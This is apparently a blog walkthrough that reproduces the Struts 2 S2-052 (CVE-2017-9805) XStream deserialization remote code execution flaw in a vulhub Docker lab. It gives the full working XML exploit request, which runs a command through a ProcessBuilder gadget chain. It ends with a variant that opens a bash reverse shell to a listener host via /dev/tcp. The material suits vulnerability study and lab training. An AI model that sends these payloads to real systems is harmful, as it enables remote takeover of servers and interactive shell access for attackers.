Recurrence of struts 2-052 vulnerability

 

preface

The application of struts 2 is full of holes. Recently, I suddenly thought about studying the relevant principles and utilization. s2-052 vulnerability is caused by lgtm Com security researcher reported that CVE-2017-9805 is a remote command execution vulnerability with a Critical degree of vulnerability. When users use the Struts REST plug-in with XStream program to process XML payloads, they may be attacked by remote code execution.

Affected version: struts version 2.5.12, Baidu said it also affected version 2.3.33.

1. Environmental construction

This reproduction adopts ubuntu system and docker deployment environment. Let's discuss the following problems encountered in the process of environment deployment and.

Please check the following connection for details. Note the difference between docker and docker compose of Linux.

https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md

Please execute the following commands to build the shooting range environment

apt install git docker.io docker-compose

git clone https://github.com/vulhub/vulhub.git

cd vulhub/struts2/s2-052/

docker-compose build

docker-compose up -d

be careful:

An error may be reported during the last step: failed to start docker service: Unit docker. service is masked.

resolvent:

systemctl unmask docker.service

systemctl unmask docker.socket

systemctl start docker.service

2.s2-052 reproduction

Check whether the environment is successfully deployed according to the operation in the first step, and access the relevant address of the environment, as shown in the screenshot.

Use the BurpSiute tool to launch the payload to the target server. For detailed POST data and matters needing attention, please see the following code block,

POST /orders HTTP/1.1
Host: 192.168.204.142:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml  # This field needs to be added to the packet header
Content-Length: 2414
Cookie: JSESSIONID=CF855BF35B5C60451837EEC2B4830419
Connection: close
Upgrade-Insecure-Requests: 1

<map>
<entry>
     <jdk.nashorn.internal.objects.NativeString>
       <flags>0</flags>
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         <dataHandler>
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <initialized>false</initialized>
                 <opmode>0</opmode>
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                       <command>
<string>touch</string>   # Execute command
<string>/tmp/s2-052test.txt</string> # Execute command
                       </command>
                       <redirectErrorStream>false</redirectErrorStream>
                     </next>
                   </iter>
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
                     <method>
                       <class>java.lang.ProcessBuilder</class>
                       <name>start</name>
                       <parameter-types/>
                     </method>
                     <name>foo</name>
                   </filter>
                   <next class="string">foo</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
               <ibuffer/>
               <done>false</done>
               <ostart>0</ostart>
               <ofinish>0</ofinish>
               <closed>false</closed>
             </is>
             <consumed>false</consumed>
           </dataSource>
           <transferFlavors/>
         </dataHandler>
         <dataLen>0</dataLen>
       </value>
     </jdk.nashorn.internal.objects.NativeString>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
   </entry>
   <entry>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   </entry>
 </map>

http header information

Add the command to be executed to the command field

Check the server results

 3.POC study

During the experiment, I tried to execute other commands, but it seems that the vulnerability is not echoed. After further exploration, I found that the tag of the executed command cannot be filled in at will.

                       <command>
<string>touch</string>
<string>/tmp/s2-052test.txt</string>
                       </command>

Try to execute the command shell.

<string>bash</string>
<string>-c</string>
<string>bash -i >&amp;/dev/tcp/192.168.204.135/10101 0>&amp;1</string>

Reference connection: https://www.freebuf.com/vuls/147017.html

Tags: security

Posted by cyberRobot on Wed, 11 May 2022 11:27:58 +0300